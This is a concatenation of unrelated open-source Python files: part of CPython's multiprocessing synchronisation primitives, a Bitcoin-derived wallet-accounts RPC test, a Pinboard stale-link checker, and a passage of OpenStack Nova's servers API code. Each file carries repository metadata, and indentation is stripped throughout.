sl = self._semlock = _multiprocessing.SemLock(
kind, value, maxvalue, self._make_name(),
unlink_now)
except FileExistsError:
pass
else:
break
else:
raise FileExistsError('cannot find name for semaphore')
util.debug('created semlock with handle %s' % sl.handle)
self._make_methods()
if sys.platform != 'win32':
def _after_fork(obj):
obj._semlock._after_fork()
util.register_after_fork(self, _after_fork)
if self._semlock.name is not None:
# We only get here if we are on Unix with forking
# disabled. When the object is garbage collected or the
# process shuts down we unlink the semaphore name
from .semaphore_tracker import register
register(self._semlock.name)
util.Finalize(self, SemLock._cleanup, (self._semlock.name,),
exitpriority=0)
@staticmethod
def _cleanup(name):
from .semaphore_tracker import unregister
sem_unlink(name)
unregister(name)
def _make_methods(self):
self.acquire = self._semlock.acquire
self.release = self._semlock.release
def __enter__(self):
return self._semlock.__enter__()
def __exit__(self, *args):
return self._semlock.__exit__(*args)
def __getstate__(self):
context.assert_spawning(self)
sl = self._semlock
if sys.platform == 'win32':
h = context.get_spawning_popen().duplicate_for_child(sl.handle)
else:
h = sl.handle
return (h, sl.kind, sl.maxvalue, sl.name)
def __setstate__(self, state):
self._semlock = _multiprocessing.SemLock._rebuild(*state)
util.debug('recreated blocker with handle %r' % state[0])
self._make_methods()
@staticmethod
def _make_name():
return '%s-%s' % (process.current_process()._config['semprefix'],
next(SemLock._rand))
#
# Semaphore
#
class Semaphore(SemLock):
def __init__(self, value=1, *, ctx):
SemLock.__init__(self, SEMAPHORE, value, SEM_VALUE_MAX, ctx=ctx)
def get_value(self):
return self._semlock._get_value()
def __repr__(self):
try:
value = self._semlock._get_value()
except Exception:
value = 'unknown'
return '<%s(value=%s)>' % (self.__class__.__name__, value)
#
# Bounded semaphore
#
class BoundedSemaphore(Semaphore):
def __init__(self, value=1, *, ctx):
SemLock.__init__(self, SEMAPHORE, value, value, ctx=ctx)
def __repr__(self):
try:
value = self._semlock._get_value()
except Exception:
value = 'unknown'
return '<%s(value=%s, maxvalue=%s)>' % \
(self.__class__.__name__, value, self._semlock.maxvalue)
#
# Non-recursive lock
#
class Lock(SemLock):
def __init__(self, *, ctx):
SemLock.__init__(self, SEMAPHORE, 1, 1, ctx=ctx)
def __repr__(self):
try:
if self._semlock._is_mine():
name = process.current_process().name
if threading.current_thread().name != 'MainThread':
name += '|' + threading.current_thread().name
elif self._semlock._get_value() == 1:
name = 'None'
elif self._semlock._count() > 0:
name = 'SomeOtherThread'
else:
name = 'SomeOtherProcess'
except Exception:
name = 'unknown'
return '<%s(owner=%s)>' % (self.__class__.__name__, name)
#
# Recursive lock
#
class RLock(SemLock):
def __init__(self, *, ctx):
SemLock.__init__(self, RECURSIVE_MUTEX, 1, 1, ctx=ctx)
def __repr__(self):
try:
if self._semlock._is_mine():
name = process.current_process().name
if threading.current_thread().name != 'MainThread':
name += '|' + threading.current_thread().name
count = self._semlock._count()
elif self._semlock._get_value() == 1:
name, count = 'None', 0
elif self._semlock._count() > 0:
name, count = 'SomeOtherThread', 'nonzero'
else:
name, count = 'SomeOtherProcess', 'nonzero'
except Exception:
name, count = 'unknown', 'unknown'
return '<%s(%s, %s)>' % (self.__class__.__name__, name, count)
#
# Condition variable
#
class Condition(object):
def __init__(self, lock=None, *, ctx):
self._lock = lock or ctx.RLock()
self._sleeping_count = ctx.Semaphore(0)
self._woken_count = ctx.Semaphore(0)
self._wait_semaphore = ctx.Semaphore(0)
self._make_methods()
def __getstate__(self):
context.assert_spawning(self)
return (self._lock, self._sleeping_count,
self._woken_count, self._wait_semaphore)
def __setstate__(self, state):
(self._lock, self._sleeping_count,
self._woken_count, self._wait_semaphore) = state
self._make_methods()
def __enter__(self):
return self._lock.__enter__()
def __exit__(self, *args):
return self._lock.__exit__(*args)
def _make_methods(self):
self.acquire = self._lock.acquire
self.release = self._lock.release
def __repr__(self):
try:
num_waiters = (self._sleeping_count._semlock._get_value() -
self._woken_count._semlock._get_value())
except Exception:
num_waiters = 'unknown'
return '<%s(%s, %s)>' % (self.__class__.__name__, self._lock, num_waiters)
def wait(self, timeout=None):
assert self._lock._semlock._is_mine(), \
'must acquire() condition before using wait()'
# indicate that this thread is going to sleep
self._sleeping_count.release()
# release lock
count = self._lock._semlock._count()
for i in range(count):
self._lock.release()
try:
# wait for notification or timeout
return self._wait_semaphore.acquire(True, timeout)
finally:
# indicate that this thread has woken
self._woken_count.release()
# reacquire lock
for i in range(count):
self._lock.acquire()
def notify(self, n=1):
assert self._lock._semlock._is_mine(), 'lock is not owned'
assert not self._wait_semaphore.acquire(
False), ('notify: Should not have been able to acquire'
+ '_wait_semaphore')
# to take account of timeouts since last notify*() we subtract
# woken_count from sleeping_count and rezero woken_count
while self._woken_count.acquire(False):
res = self._sleeping_count.acquire(False)
assert res, ('notify: Bug in sleeping_count.acquire'
+ '- res should not be False')
sleepers = 0
while sleepers < n and self._sleeping_count.acquire(False):
self._wait_semaphore.release() # wake up one sleeper
sleepers += 1
if sleepers:
for i in range(sleepers):
self._woken_count.acquire() # wait for a sleeper to wake
# rezero wait_semaphore in case some timeouts just happened
while self._wait_semaphore.acquire(False):
pass
def notify_all(self):
self.notify(n=sys.maxsize)
def wait_for(self, predicate, timeout=None):
result = predicate()
if result:
return result
if timeout is not None:
endtime = _time() + timeout
else:
endtime = None
waittime = None
while not result:
if endtime is not None:
waittime = endtime - _time()
if waittime <= 0:
break
self.wait(waittime)
result = predicate()
return result
#
# Event
#
class Event(object):
def __init__(self, *, ctx):
self._cond = ctx.Condition(ctx.Lock())
self._flag = ctx.Semaphore(0)
def is_set(self):
with self._cond:
if self._flag.acquire(False):
self._flag.release()
return True
return False
def set(self):
with self._cond:
self._flag.acquire(False)
self._flag.release()
self._cond.notify_all()
def clear(self):
with self._cond:
self._flag.acquire(False)
def wait(self, timeout=None):
with self._cond:
if self._flag.acquire(False):
self._flag.release()
else:
self._cond.wait(timeout)
if self._flag.acquire(False):
self._flag.release()
return True
return False
#
# Barrier
#
class Barrier(threading.Barrier):
def __init__(self, parties, action=None, timeout=None, *, ctx):
import struct
from .heap import BufferWrapper
wrapper = BufferWrapper(struct.calcsize('i') * 2)
cond = ctx.Condition()
self.__setstate__((parties, action, timeout, cond, wrapper))
self._state = 0
self._count = 0
def __setstate__(self, state):
(self._parties, self._action, self._timeout,
self._cond, self._wrapper) = state
self._array = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._parties, self._action, self._timeout,
self._cond, self._wrapper)
@property
def _state(self):
return self._array[0]
@_state.setter
def _state(self, value):
self._array[0] = value
@property
def _count(self):
return self._array[1]
@_count.setter
def _count(self, value):
self._array[1] = value
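# These primitives are normally obtained through a multiprocessing context
# rather than instantiated directly, e.g. (sketch):
#
#     import multiprocessing as mp
#     ctx = mp.get_context()
#     lock = ctx.Lock()        # builds Lock(ctx=ctx) from this module
#     with lock:
#         pass                 # critical section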
| kenshay/ImageScript | Script_Runner/PYTHON/Lib/multiprocessing/synchronize.py | Python | gpl-3.0 | 11,587 |
#!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test account RPCs.
RPCs tested are:
- getaccountaddress
- getaddressesbyaccount
- listaddressgroupings
- setaccount
- sendfrom (with account arguments)
- move (with account arguments)
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
start_nodes,
assert_equal,
)
class WalletAccountsTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [[]]
def run_test(self):
node = self.nodes[0]
# Check that there's no UTXO on any of the nodes
assert_equal(len(node.listunspent()), 0)
# Note each time we call generate, all generated coins go into
# the same address, so we call twice to get two addresses w/50 each
node.generate(1)
node.generate(101)
assert_equal(node.getbalance(), 100)
# there should be 2 address groups
# each with 1 address with a balance of 50 Bitcoins
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 2)
# the addresses aren't linked now, but will be after we send to the
# common address
linked_addresses = set()
for address_group in address_groups:
assert_equal(len(address_group), 1)
assert_equal(len(address_group[0]), 2)
assert_equal(address_group[0][1], 50)
linked_addresses.add(address_group[0][0])
# send 50 from each address to a third address not in this wallet
# There's some fee that will come back to us when the miner reward
# matures.
common_address = "msf4WtN1YQKXvNtvdFYt9JBnUD2FB41kjr"
txid = node.sendmany(
fromaccount="",
amounts={common_address: 100},
subtractfeefrom=[common_address],
minconf=1,
)
tx_details = node.gettransaction(txid)
fee = -tx_details['details'][0]['fee']
# there should be 1 address group, with the previously
# unlinked addresses now linked (they both have 0 balance)
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 1)
assert_equal(len(address_groups[0]), 2)
assert_equal(set([a[0] for a in address_groups[0]]), linked_addresses)
assert_equal([a[1] for a in address_groups[0]], [0, 0])
node.generate(1)
# we want to reset so that the "" account has what's expected.
# otherwise we're off by exactly the fee amount as that's mined
# and matures in the next 100 blocks
node.sendfrom("", common_address, fee)
accounts = ["a", "b", "c", "d", "e"]
amount_to_send = 1.0
account_addresses = dict()
for account in accounts:
address = node.getaccountaddress(account)
account_addresses[account] = address
node.getnewaddress(account)
assert_equal(node.getaccount(address), account)
assert(address in node.getaddressesbyaccount(account))
node.sendfrom("", address, amount_to_send)
node.generate(1)
for i in range(len(accounts)):
from_account = accounts[i]
to_account = accounts[(i+1) % len(accounts)]
to_address = account_addresses[to_account]
node.sendfrom(from_account, to_address, amount_to_send)
node.generate(1)
for account in accounts:
address = node.getaccountaddress(account)
assert(address != account_addresses[account])
assert_equal(node.getreceivedbyaccount(account), 2)
node.move(account, "", node.getbalance(account))
node.generate(101)
expected_account_balances = {"": 5200}
for account in accounts:
expected_account_balances[account] = 0
assert_equal(node.listaccounts(), expected_account_balances)
assert_equal(node.getbalance(""), 5200)
for account in accounts:
address = node.getaccountaddress("")
node.setaccount(address, account)
assert(address in node.getaddressesbyaccount(account))
assert(address not in node.getaddressesbyaccount(""))
for account in accounts:
addresses = []
for x in range(10):
addresses.append(node.getnewaddress())
multisig_address = node.addmultisigaddress(5, addresses, account)
node.sendfrom("", multisig_address, 50)
node.generate(101)
for account in accounts:
assert_equal(node.getbalance(account), 50)
if __name__ == '__main__':
WalletAccountsTest().main()
| faircoin/faircoin | test/functional/wallet-accounts.py | Python | mit | 5,091 |
#!/usr/bin/env python
#
# Copyright (c) 2010-2019 Jon Parise <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Identify (and optionally delete) stale Pinboard links."""
from __future__ import print_function
import collections
import getpass
import json
import os
import re
import ssl
import sys
try:
from urllib.parse import urldefrag, urlencode, urlparse, urljoin
from urllib.request import Request, urlopen
except ImportError:
from urlparse import urldefrag, urljoin, urlparse
from urllib import urlencode
from urllib2 import Request, urlopen
__author__ = 'Jon Parise <[email protected]>'
__version__ = '2.0-dev'
PINBOARD_API_BASE = 'https://api.pinboard.in/v1/'
USER_AGENT = \
'Mozilla/5.0 (compatible; stale/{}; +https://github.com/jparise/stale)' \
.format(__version__)
COLORS = collections.defaultdict(str)
def pinboard_call(path, token, **kwargs):
"""Make a Pinboard API request and return a JSON-parsed response."""
params = kwargs.copy()
params['auth_token'] = token
params['format'] = 'json'
url = urljoin(PINBOARD_API_BASE, path)
url += '?' + urlencode(params)
request = Request(url)
request.add_header('User-Agent', USER_AGENT)
    response = urlopen(request)
return json.load(response)
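# Usage sketch (hypothetical token): pinboard_call('posts/all', token)
# returns the JSON-decoded response, e.g. a list of post dicts.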
def check_url(url):
"""Check the given URL by issuring a HEAD request."""
# We don't want to include a fragment in our request.
url, fragment = urldefrag(url)
# Attempt to open the target URL using a HEAD request.
request = Request(url)
request.get_method = lambda: 'HEAD'
request.add_header('User-Agent', USER_AGENT)
return urlopen(request)
def report(code, url):
if str(code) == 'OK':
color = 'green'
else:
color = 'red'
print('{}[{}] {}{}'.format(COLORS[color], code, COLORS['normal'], url))
def supports_color():
# Windows only supports colors if ANSICON is defined.
if sys.platform == 'win32' and 'ANSICON' not in os.environ:
return False
# Otherwise, we assume all TTYs support ANSI color.
    return getattr(sys.stdout, 'isatty', lambda: False)()
def main():
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-t', '--token',
help="your Pinboard API token ('username:hex-values')")
parser.add_argument('--ignore', nargs='+', type=re.compile,
help="ignore links from these hosts", metavar='REGEX')
parser.add_argument('-d', '--delete', action='store_true',
help="delete stale links", default=False)
parser.add_argument('-e', action='store_true', dest='errors',
help="equate errors with staleness", default=False)
parser.add_argument('-v', action='store_true', dest='verbose',
help="enable verbose output", default=False)
parser.add_argument('--version', action='version', version=__version__)
args = parser.parse_args()
if not args.token:
try:
args.token = getpass.getpass('API Token: ')
except KeyboardInterrupt:
sys.exit(0)
# If the terminal supports ANSI color, set up our color codes.
if supports_color():
COLORS['normal'] = '\033[0m'
COLORS['green'] = '\033[32m'
COLORS['red'] = '\033[31m'
try:
posts = pinboard_call('posts/all', token=args.token)
except Exception as e:
print("Failed to retrieve posts:", e)
sys.exit(1)
if not posts:
print("No posts were retrieved.")
sys.exit(1)
if args.verbose:
print("Checking {} posts ...".format(len(posts)))
for post in posts:
url = post['href']
stale = False
# If we have some hostnames to ignore, parse the URL and check if it
# matches one of the patterns.
if args.ignore:
parsed = urlparse(url)
            if any(pattern.match(parsed.hostname) for pattern in args.ignore):
                report('Skip', url)
                continue
try:
result = check_url(url)
except KeyboardInterrupt:
break
except (IOError, ssl.CertificateError) as e:
report('!!', url)
print('> ' + str(e).replace('\n', '\n> '))
if args.errors:
stale = True
else:
code = result.getcode()
            if code // 100 == 4 and code != 403:
stale = True
report(str(code), url)
elif args.verbose:
report('OK', url)
if stale and args.delete:
print(" Deleting {}".format(url))
try:
pinboard_call('posts/delete', token=args.token, url=url)
except Exception as e:
print('> ' + str(e))
if __name__ == '__main__':
main()
| jparise/stale | stale.py | Python | mit | 5,905 |
# Copyright 2010 OpenStack Foundation
# Copyright 2011 Piston Cloud Computing, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import os
import re
from oslo.config import cfg
from oslo import messaging
import six
import webob
from webob import exc
from nova.api.openstack import common
from nova.api.openstack.compute import ips
from nova.api.openstack.compute.views import servers as views_servers
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import block_device
from nova import compute
from nova.compute import flavors
from nova import exception
from nova.objects import block_device as block_device_obj
from nova.objects import instance as instance_obj
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.openstack.common import strutils
from nova.openstack.common import timeutils
from nova.openstack.common import uuidutils
from nova import policy
from nova import utils
server_opts = [
cfg.BoolOpt('enable_instance_password',
default=True,
help='Enables returning of the instance password by the'
' relevant server API calls such as create, rebuild'
' or rescue, If the hypervisor does not support'
' password injection then the password returned will'
' not be correct'),
]
CONF = cfg.CONF
CONF.register_opts(server_opts)
CONF.import_opt('network_api_class', 'nova.network')
CONF.import_opt('reclaim_instance_interval', 'nova.compute.manager')
LOG = logging.getLogger(__name__)
XML_WARNING = False
def make_fault(elem):
fault = xmlutil.SubTemplateElement(elem, 'fault', selector='fault')
fault.set('code')
fault.set('created')
msg = xmlutil.SubTemplateElement(fault, 'message')
msg.text = 'message'
det = xmlutil.SubTemplateElement(fault, 'details')
det.text = 'details'
def make_server(elem, detailed=False):
elem.set('name')
elem.set('id')
global XML_WARNING
if not XML_WARNING:
LOG.warning(_('XML support has been deprecated and may be removed '
'as early as the Juno release.'))
XML_WARNING = True
if detailed:
elem.set('userId', 'user_id')
elem.set('tenantId', 'tenant_id')
elem.set('updated')
elem.set('created')
elem.set('hostId')
elem.set('accessIPv4')
elem.set('accessIPv6')
elem.set('status')
elem.set('progress')
elem.set('reservation_id')
# Attach image node
image = xmlutil.SubTemplateElement(elem, 'image', selector='image')
image.set('id')
xmlutil.make_links(image, 'links')
# Attach flavor node
flavor = xmlutil.SubTemplateElement(elem, 'flavor', selector='flavor')
flavor.set('id')
xmlutil.make_links(flavor, 'links')
# Attach fault node
make_fault(elem)
# Attach metadata node
elem.append(common.MetadataTemplate())
# Attach addresses node
elem.append(ips.AddressesTemplate())
xmlutil.make_links(elem, 'links')
server_nsmap = {None: xmlutil.XMLNS_V11, 'atom': xmlutil.XMLNS_ATOM}
class ServerTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('server', selector='server')
make_server(root, detailed=True)
return xmlutil.MasterTemplate(root, 1, nsmap=server_nsmap)
class MinimalServersTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('servers')
elem = xmlutil.SubTemplateElement(root, 'server', selector='servers')
make_server(elem)
xmlutil.make_links(root, 'servers_links')
return xmlutil.MasterTemplate(root, 1, nsmap=server_nsmap)
class ServersTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('servers')
elem = xmlutil.SubTemplateElement(root, 'server', selector='servers')
make_server(elem, detailed=True)
return xmlutil.MasterTemplate(root, 1, nsmap=server_nsmap)
class ServerAdminPassTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('server')
root.set('adminPass')
return xmlutil.SlaveTemplate(root, 1, nsmap=server_nsmap)
class ServerMultipleCreateTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('server')
root.set('reservation_id')
return xmlutil.MasterTemplate(root, 1, nsmap=server_nsmap)
def FullServerTemplate():
master = ServerTemplate()
master.attach(ServerAdminPassTemplate())
return master
class CommonDeserializer(wsgi.MetadataXMLDeserializer):
"""Common deserializer to handle xml-formatted server create requests.
Handles standard server attributes as well as optional metadata
and personality attributes
"""
metadata_deserializer = common.MetadataXMLDeserializer()
def _extract_personality(self, server_node):
"""Marshal the personality attribute of a parsed request."""
node = self.find_first_child_named(server_node, "personality")
if node is not None:
personality = []
for file_node in self.find_children_named(node, "file"):
item = {}
if file_node.hasAttribute("path"):
item["path"] = file_node.getAttribute("path")
item["contents"] = self.extract_text(file_node)
personality.append(item)
return personality
else:
return None
def _extract_server(self, node):
"""Marshal the server attribute of a parsed request."""
server = {}
server_node = self.find_first_child_named(node, 'server')
attributes = ["name", "imageRef", "flavorRef", "adminPass",
"accessIPv4", "accessIPv6", "key_name",
"availability_zone", "min_count", "max_count"]
for attr in attributes:
if server_node.getAttribute(attr):
server[attr] = server_node.getAttribute(attr)
res_id = server_node.getAttribute('return_reservation_id')
if res_id:
server['return_reservation_id'] = \
strutils.bool_from_string(res_id)
scheduler_hints = self._extract_scheduler_hints(server_node)
if scheduler_hints:
server['OS-SCH-HNT:scheduler_hints'] = scheduler_hints
metadata_node = self.find_first_child_named(server_node, "metadata")
if metadata_node is not None:
server["metadata"] = self.extract_metadata(metadata_node)
user_data_node = self.find_first_child_named(server_node, "user_data")
if user_data_node is not None:
server["user_data"] = self.extract_text(user_data_node)
personality = self._extract_personality(server_node)
if personality is not None:
server["personality"] = personality
networks = self._extract_networks(server_node)
if networks is not None:
server["networks"] = networks
security_groups = self._extract_security_groups(server_node)
if security_groups is not None:
server["security_groups"] = security_groups
# NOTE(vish): this is not namespaced in json, so leave it without a
# namespace for now
block_device_mapping = self._extract_block_device_mapping(server_node)
if block_device_mapping is not None:
server["block_device_mapping"] = block_device_mapping
block_device_mapping_v2 = self._extract_block_device_mapping_v2(
server_node)
if block_device_mapping_v2 is not None:
server["block_device_mapping_v2"] = block_device_mapping_v2
# NOTE(vish): Support this incorrect version because it was in the code
# base for a while and we don't want to accidentally break
# anyone that might be using it.
auto_disk_config = server_node.getAttribute('auto_disk_config')
if auto_disk_config:
server['OS-DCF:diskConfig'] = auto_disk_config
auto_disk_config = server_node.getAttribute('OS-DCF:diskConfig')
if auto_disk_config:
server['OS-DCF:diskConfig'] = auto_disk_config
config_drive = server_node.getAttribute('config_drive')
if config_drive:
server['config_drive'] = config_drive
return server
def _extract_block_device_mapping(self, server_node):
"""Marshal the block_device_mapping node of a parsed request."""
node = self.find_first_child_named(server_node, "block_device_mapping")
if node:
block_device_mapping = []
for child in self.extract_elements(node):
if child.nodeName != "mapping":
continue
mapping = {}
attributes = ["volume_id", "snapshot_id", "device_name",
"virtual_name", "volume_size"]
for attr in attributes:
value = child.getAttribute(attr)
if value:
mapping[attr] = value
attributes = ["delete_on_termination", "no_device"]
for attr in attributes:
value = child.getAttribute(attr)
if value:
mapping[attr] = strutils.bool_from_string(value)
block_device_mapping.append(mapping)
return block_device_mapping
else:
return None
def _extract_block_device_mapping_v2(self, server_node):
"""Marshal the new block_device_mappings."""
node = self.find_first_child_named(server_node,
"block_device_mapping_v2")
if node:
block_device_mapping = []
for child in self.extract_elements(node):
if child.nodeName != "mapping":
continue
block_device_mapping.append(
dict((attr, child.getAttribute(attr))
for attr in block_device.bdm_new_api_fields
if child.getAttribute(attr)))
return block_device_mapping
def _extract_scheduler_hints(self, server_node):
"""Marshal the scheduler hints attribute of a parsed request."""
node = self.find_first_child_named_in_namespace(server_node,
"http://docs.openstack.org/compute/ext/scheduler-hints/api/v2",
"scheduler_hints")
if node:
scheduler_hints = {}
for child in self.extract_elements(node):
scheduler_hints.setdefault(child.nodeName, [])
value = self.extract_text(child).strip()
scheduler_hints[child.nodeName].append(value)
return scheduler_hints
else:
return None
def _extract_networks(self, server_node):
"""Marshal the networks attribute of a parsed request."""
node = self.find_first_child_named(server_node, "networks")
if node is not None:
networks = []
for network_node in self.find_children_named(node,
"network"):
item = {}
if network_node.hasAttribute("uuid"):
item["uuid"] = network_node.getAttribute("uuid")
if network_node.hasAttribute("fixed_ip"):
item["fixed_ip"] = network_node.getAttribute("fixed_ip")
if network_node.hasAttribute("port"):
item["port"] = network_node.getAttribute("port")
networks.append(item)
return networks
else:
return None
def _extract_security_groups(self, server_node):
"""Marshal the security_groups attribute of a parsed request."""
node = self.find_first_child_named(server_node, "security_groups")
if node is not None:
security_groups = []
for sg_node in self.find_children_named(node, "security_group"):
item = {}
name = self.find_attribute_or_element(sg_node, 'name')
if name:
item["name"] = name
security_groups.append(item)
return security_groups
else:
return None
class ActionDeserializer(CommonDeserializer):
"""Deserializer to handle xml-formatted server action requests.
Handles standard server attributes as well as optional metadata
and personality attributes
"""
def default(self, string):
dom = xmlutil.safe_minidom_parse_string(string)
action_node = dom.childNodes[0]
action_name = action_node.tagName
action_deserializer = {
'createImage': self._action_create_image,
'changePassword': self._action_change_password,
'reboot': self._action_reboot,
'rebuild': self._action_rebuild,
'resize': self._action_resize,
'confirmResize': self._action_confirm_resize,
'revertResize': self._action_revert_resize,
}.get(action_name, super(ActionDeserializer, self).default)
action_data = action_deserializer(action_node)
return {'body': {action_name: action_data}}
def _action_create_image(self, node):
return self._deserialize_image_action(node, ('name',))
def _action_change_password(self, node):
if not node.hasAttribute("adminPass"):
raise AttributeError("No adminPass was specified in request")
return {"adminPass": node.getAttribute("adminPass")}
def _action_reboot(self, node):
if not node.hasAttribute("type"):
raise AttributeError("No reboot type was specified in request")
return {"type": node.getAttribute("type")}
def _action_rebuild(self, node):
rebuild = {}
if node.hasAttribute("name"):
name = node.getAttribute("name")
if not name:
raise AttributeError("Name cannot be blank")
rebuild['name'] = name
if node.hasAttribute("auto_disk_config"):
rebuild['OS-DCF:diskConfig'] = node.getAttribute(
"auto_disk_config")
if node.hasAttribute("OS-DCF:diskConfig"):
rebuild['OS-DCF:diskConfig'] = node.getAttribute(
"OS-DCF:diskConfig")
metadata_node = self.find_first_child_named(node, "metadata")
if metadata_node is not None:
rebuild["metadata"] = self.extract_metadata(metadata_node)
personality = self._extract_personality(node)
if personality is not None:
rebuild["personality"] = personality
if not node.hasAttribute("imageRef"):
raise AttributeError("No imageRef was specified in request")
rebuild["imageRef"] = node.getAttribute("imageRef")
if node.hasAttribute("adminPass"):
rebuild["adminPass"] = node.getAttribute("adminPass")
if node.hasAttribute("accessIPv4"):
rebuild["accessIPv4"] = node.getAttribute("accessIPv4")
if node.hasAttribute("accessIPv6"):
rebuild["accessIPv6"] = node.getAttribute("accessIPv6")
if node.hasAttribute("preserve_ephemeral"):
rebuild["preserve_ephemeral"] = strutils.bool_from_string(
node.getAttribute("preserve_ephemeral"), strict=True)
return rebuild
def _action_resize(self, node):
resize = {}
if node.hasAttribute("flavorRef"):
resize["flavorRef"] = node.getAttribute("flavorRef")
else:
raise AttributeError("No flavorRef was specified in request")
if node.hasAttribute("auto_disk_config"):
resize['OS-DCF:diskConfig'] = node.getAttribute("auto_disk_config")
if node.hasAttribute("OS-DCF:diskConfig"):
resize['OS-DCF:diskConfig'] = node.getAttribute(
"OS-DCF:diskConfig")
return resize
def _action_confirm_resize(self, node):
return None
def _action_revert_resize(self, node):
return None
def _deserialize_image_action(self, node, allowed_attributes):
data = {}
for attribute in allowed_attributes:
value = node.getAttribute(attribute)
if value:
data[attribute] = value
metadata_node = self.find_first_child_named(node, 'metadata')
if metadata_node is not None:
metadata = self.metadata_deserializer.extract_metadata(
metadata_node)
data['metadata'] = metadata
return data
class CreateDeserializer(CommonDeserializer):
"""Deserializer to handle xml-formatted server create requests.
Handles standard server attributes as well as optional metadata
and personality attributes
"""
def default(self, string):
"""Deserialize an xml-formatted server create request."""
dom = xmlutil.safe_minidom_parse_string(string)
server = self._extract_server(dom)
return {'body': {'server': server}}
class Controller(wsgi.Controller):
"""The Server API base controller class for the OpenStack API."""
_view_builder_class = views_servers.ViewBuilder
@staticmethod
def _add_location(robj):
# Just in case...
if 'server' not in robj.obj:
return robj
link = filter(lambda l: l['rel'] == 'self',
robj.obj['server']['links'])
if link:
robj['Location'] = utils.utf8(link[0]['href'])
# Convenience return
return robj
def __init__(self, ext_mgr=None, **kwargs):
super(Controller, self).__init__(**kwargs)
self.compute_api = compute.API()
self.ext_mgr = ext_mgr
@wsgi.serializers(xml=MinimalServersTemplate)
def index(self, req):
"""Returns a list of server names and ids for a given user."""
try:
servers = self._get_servers(req, is_detail=False)
except exception.Invalid as err:
raise exc.HTTPBadRequest(explanation=err.format_message())
return servers
@wsgi.serializers(xml=ServersTemplate)
def detail(self, req):
"""Returns a list of server details for a given user."""
try:
servers = self._get_servers(req, is_detail=True)
except exception.Invalid as err:
raise exc.HTTPBadRequest(explanation=err.format_message())
return servers
def _get_servers(self, req, is_detail):
"""Returns a list of servers, based on any search options specified."""
search_opts = {}
search_opts.update(req.GET)
context = req.environ['nova.context']
remove_invalid_options(context, search_opts,
self._get_server_search_options())
# Verify search by 'status' contains a valid status.
# Convert it to filter by vm_state or task_state for compute_api.
status = search_opts.pop('status', None)
if status is not None:
vm_state, task_state = common.task_and_vm_state_from_status(status)
if not vm_state and not task_state:
return {'servers': []}
search_opts['vm_state'] = vm_state
# When we search by vm state, task state will return 'default'.
# So we don't need task_state search_opt.
if 'default' not in task_state:
search_opts['task_state'] = task_state
if 'changes-since' in search_opts:
try:
parsed = timeutils.parse_isotime(search_opts['changes-since'])
except ValueError:
msg = _('Invalid changes-since value')
raise exc.HTTPBadRequest(explanation=msg)
search_opts['changes-since'] = parsed
# By default, compute's get_all() will return deleted instances.
# If an admin hasn't specified a 'deleted' search option, we need
# to filter out deleted instances by setting the filter ourselves.
# ... Unless 'changes-since' is specified, because 'changes-since'
# should return recently deleted images according to the API spec.
if 'deleted' not in search_opts:
if 'changes-since' not in search_opts:
# No 'changes-since', so we only want non-deleted servers
search_opts['deleted'] = False
if search_opts.get("vm_state") == ['deleted']:
if context.is_admin:
search_opts['deleted'] = True
else:
msg = _("Only administrators may list deleted instances")
raise exc.HTTPForbidden(explanation=msg)
# If all tenants is passed with 0 or false as the value
# then remove it from the search options. Nothing passed as
# the value for all_tenants is considered to enable the feature
all_tenants = search_opts.get('all_tenants')
if all_tenants:
try:
if not strutils.bool_from_string(all_tenants, True):
del search_opts['all_tenants']
except ValueError as err:
raise exception.InvalidInput(str(err))
if 'all_tenants' in search_opts:
policy.enforce(context, 'compute:get_all_tenants',
{'project_id': context.project_id,
'user_id': context.user_id})
del search_opts['all_tenants']
else:
if context.project_id:
search_opts['project_id'] = context.project_id
else:
search_opts['user_id'] = context.user_id
limit, marker = common.get_limit_and_marker(req)
try:
instance_list = self.compute_api.get_all(context,
search_opts=search_opts,
limit=limit,
marker=marker,
want_objects=True)
except exception.MarkerNotFound:
msg = _('marker [%s] not found') % marker
raise exc.HTTPBadRequest(explanation=msg)
except exception.FlavorNotFound:
log_msg = _("Flavor '%s' could not be found ")
LOG.debug(log_msg, search_opts['flavor'])
